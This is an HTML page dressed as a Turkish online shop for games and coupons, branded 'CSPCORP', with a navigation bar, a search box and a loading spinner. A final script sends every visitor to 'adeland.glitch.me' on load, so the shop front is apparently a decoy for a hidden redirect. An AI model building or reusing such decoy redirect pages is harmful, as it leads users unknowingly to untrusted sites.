<html><head>
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous"><style>.lds-ripple {
  display: inline-block;
  position: relative;
  width: 80px;
  height: 80px;
}
.lds-ripple div {
  position: absolute;
  border: 4px solid #fff;
  opacity: 1;
  border-radius: 50%;
  animation: lds-ripple 1s cubic-bezier(0, 0.2, 0.8, 1) infinite;
}
.lds-ripple div:nth-child(2) {
  animation-delay: -0.5s;
}
@keyframes lds-ripple {
  0% {
    top: 36px;
    left: 36px;
    width: 0;
    height: 0;
    opacity: 0;
  }
  4.9% {
    top: 36px;
    left: 36px;
    width: 0;
    height: 0;
    opacity: 0;
  }
  5% {
    top: 36px;
    left: 36px;
    width: 0;
    height: 0;
    opacity: 1;
  }
  100% {
    top: 0px;
    left: 0px;
    width: 72px;
    height: 72px;
    opacity: 0;
  }
}
</style>
   </head>
   <body data-bs-theme="dark">
      <nav class="navbar navbar-expand-lg bg-body-tertiary">
  <div class="container-fluid">
    <a class="navbar-brand" href="#" style="
    color: #beabea;
    font-weight: 900;
">CSPCORP</a>
    <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
      <span class="navbar-toggler-icon"></span>
    </button>
    <div class="collapse navbar-collapse" id="navbarNav">
      <ul class="navbar-nav">
        <li class="nav-item">
          <a class="nav-link active" aria-current="page" href="#">Anasayfa</a>
        </li>
        <li class="nav-item">
          <a class="nav-link">Kategoriler</a>
        </li>
        <li class="nav-item">
          <a class="nav-link">Markalar</a>
        </li>
        <li class="nav-item">
          <a class="nav-link">Blog</a>
        </li>
      <li class="nav-item">
          <a class="nav-link">Mağazalar</a>
        </li><li class="nav-item">
          <a class="nav-link">Fırsatlar</a>
        </li><li class="nav-item">
          <a class="nav-link">Çok İncelenenler</a>
        </li><li class="nav-item">
          <a class="nav-link">Çok Satanlar</a>
        </li><li class="nav-item">
          <a class="nav-link">Yeni Ürünler</a>
        </li><li class="nav-item">
          <a class="nav-link">İndirimli Ürünler</a>
        </li><li class="nav-item" style="
    width: 600px;
">
          <a class="nav-link">Hesabım</a>
        </li></ul>      <div class="d-flex justify-content-between" role="search">
        <input class="form-control me-2" type="search" placeholder="Oyun veya Kupon ara" aria-label="Search">
        <button class="btn btn-outline-success" type="submit" style="
    color: #beabea;
    border: 1px solid #beabea;
">Ara</button>
      </div>
    </div>
  </div>
</nav><div class="position-absolute top-50 start-50 translate-middle"><div class="lds-ripple"><div></div><div></div></div></div>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script><script>location.href="https://adeland.glitch.me"</script>
   

</body></html>
